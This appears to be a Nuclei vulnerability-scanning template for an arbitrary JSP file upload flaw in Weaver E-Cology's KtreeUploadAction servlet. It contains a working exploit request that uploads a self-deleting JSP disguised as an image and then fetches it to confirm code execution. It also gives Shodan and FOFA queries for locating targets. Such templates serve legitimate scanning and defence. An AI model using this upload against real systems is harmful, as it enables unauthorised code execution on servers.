id: weaver-ktreeuploadaction-file-upload

info:
  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
  reference:
    - https://buaq.net/go-117479.html
  metadata:
    verified: true
    max-request: 2
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  tags: weaver,ecology,fileupload,intrusive
variables:
  num1: "{{rand_int(40000, 50000)}}"
  num2: "{{rand_int(40000, 50000)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib

        ------WebKitFormBoundarywgljfvib
        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundarywgljfvib--
      - |
        @timeout: 20s
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
          - "contains(body_2, '{{result}}') && status_code_2 == 200"
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - "','url':'(.*?)','title"
        internal: true

# digest: 490a0046304402203845240787e3da61949c359ff2e44cc0797d850f8aa35cbf4e8a9cb052a3bb5b022003685a977b9463c7de0e27f8227f54e5559e6dc17663eb17c1f35122ea4a7f24:922c64590222798bb761d5b6d8e72950